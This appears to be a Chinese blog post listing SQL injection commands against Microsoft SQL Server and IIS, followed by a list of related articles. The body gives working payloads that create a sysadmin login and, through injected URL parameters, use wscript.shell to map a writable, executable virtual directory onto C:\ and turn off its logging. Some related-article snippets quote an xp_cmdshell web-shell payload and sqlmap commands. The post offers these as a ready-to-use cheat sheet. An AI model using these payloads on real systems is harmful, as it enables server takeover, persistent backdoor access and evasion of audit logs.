一些SQL注入中的命令

最新推荐文章于 2022-10-16 14:33:42 发布
最新推荐文章于 2022-10-16 14:33:42 发布
阅读量1.2k 收藏
点赞数
分类专栏: 安全 文章标签: sql null c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liswa/article/details/802900
版权

1、加管理员

exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin

 2、加虚拟目录

http://abc.com/abc.asp?id=1;declare @s varchar(21) set @s='wscript.shell'declare @o int exec sp_oacreate @s,@o out;exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/mkwebdir.vbs -c localhost -w "1" -v "0x07c2","c:/"';exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/chaccess.vbs -a w3svc/1/ROOT/0x07c2 %2Bexecute';exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/chaccess.vbs -a w3svc/1/ROOT/0x07c2 %2Bwrite';exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/chaccess.vbs -a w3svc/1/ROOT/0x07c2 %2Bbrowse';exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/chaccess.vbs -a w3svc/1/ROOT/0x07c2 %2Bwrite';--

http://abc.com/abc.asp?id=1;declare @s varchar(21) set @s='wscript.shell'declare @o int exec sp_oacreate @s,@o out;exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/adsutil.vbs set w3svc/1/root/0x07c2/DontLog 1'

http://abc.com/abc.asp?id=1;declare @s varchar(21) set @s='wscript.shell'declare @o int exec sp_oacreate @s,@o out;exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/adsutil.vbs set w3svc/1/root/0x07c2/EnableDefaultDoc 0'

liswa
关注
专栏目录
sql注入的常用命令
09-18
sql注入的常用命令,个人总结,适合一些小白使用,大神可以了解了解,有错请指出。
常用SQL注入命令
Sky 的专栏
01-01 649
1.判断注入点是否存在 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0 and 0 3.猜帐号数目 如果遇到0 and 0 and 1 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin wh
SQL注入常用命令
duan_qiao925的博客
04-22 213
SQL注入的概念:
SQL注入的一些命令
jkhdjkasd的博客
07-27 1700
sqlmap的常用命令
mysql手动注入的命令_手动SQL注入基础详解
weixin_39778668的博客
02-04 264
Sql Injection漏洞一直是在owasp排名第一的漏洞类型,有时候注入漏洞很难通过工具检测到.本文将详细介绍一下Sql Injection的各种类型,通过利用测试的环境,让大家对Sql Injection漏洞有比较多的了解.什么是sql injection漏洞?所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗数据库服务器执行恶意的SQL...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
SQL注入源码+SQL注入命令
07-16
标题的"SQL注入源码+SQL注入命令"提示我们将探讨实际的源代码片段和可能的注入命令。在Java应用,通常使用JDBC(Java Database Connectivity)来与MySQL这样的数据库进行交互。当开发者没有对用户输入的数据进行...
SQL注入原理以及Spring Boot如何防止SQL注入(含详细示例代码)
最新发布
12-29
SQL注入是一种严重的安全威胁,它允许攻击者通过在应用程序的输入字段插入恶意SQL代码来执行未经授权的数据库操作。攻击者通常寻找没有适当验证和过滤的用户输入,然后利用这些漏洞来构造能改变原始SQL语句意图的...
最详细的SQL注入相关的命令整理.txt
07-18
#### 二、SQL注入命令详解 ##### 1. 利用`xp_cmdshell`执行系统命令 **命令示例:** ```sql keyno=1881;exec master.dbo.xp_cmdshell 'echo <script language="vbscript" runat="server">executeRequest("l")...
SQL注入攻击常用语句(非常全,不可错过)
06-29
SQL注入攻击常用语句。 内容包括: 判断有无注入点 猜帐号数目 猜解字段名称 猜解字符 得到库名 得到WEB路径 查询构造 ……
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权(提权的方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
桂林老兵的SQLSERVER高级注入技巧
动性忍心
04-12 1271
前言: 即是高级技巧,其它基本的注入方法就不详述了。 看不懂可查本站的注入基础文章。 为了更好的用好注入,建议大家看看本站的SQL语法相关文章 [获取全部数据库名] select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库 [获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名] selec
ms SQL手工注入,及高级操作
test\\的博客
10-15 250
ms SQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。SQL Server一开始并不是微软自己研发的产品,而是当时为了要和IBM竞争时,与Sybase合作所产生的,其最早的发展者是Sybase,同时微软也和Sybase合作过 SQL Server 4.2版本的研发...
注入——sql注入命令
weixin_55404107的博客
10-16 1770
sql注入—简单理解
SQL注入基础语句大全
Jeromeyoung
03-01 1万+
尽管语句很多,但是上手操作才是硬道理,话不多说直接进行SQL注入基础介绍。 原理:服务器端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器。 一: 用户登陆判断语句: SELECT*FROMusersWHEREuser='uname'ANDpassword='pass' SELECT * FROM users WHE...
常见sql注入方式
wusuopuBUPT的专栏
04-02 1万+
1.没有正确过滤转义字符   在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传递给一个SQL语句。这样就会导致应用程序的终端用户对数据库上的语句实施操纵。比方说,下面的这行代码就会演示这种漏洞:   statement := "SELECT* FROM users WHERE name = '" + userName + "';"   这种代码的设计目的是
SQL注入的一个简单实例
u012436758的博客
12-25 1万+
很多Web应用程序都使用数据库来存储信息。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递至Web应用程序。很多Web站点都会利用用户输入的参数动态地生成SQL查询要求,攻击者通过在URL、表单域,或者其他的输入域输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据进行不受限的访问。
Sqlmap常用指令
安全汪
11-06 5192
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称 sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名 sqlmap -
SQL注入命令详解:遍历与目录探测
在本文档,作者详细整理了几个关键的SQL注入命令,用于在已存在注入漏洞的系统执行文件系统操作: 1. `CREATE TABLE temp2 (dir nvarchar(255), depth varchar(255));` 这个命令创建了一个名为`temp2`的临时表...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值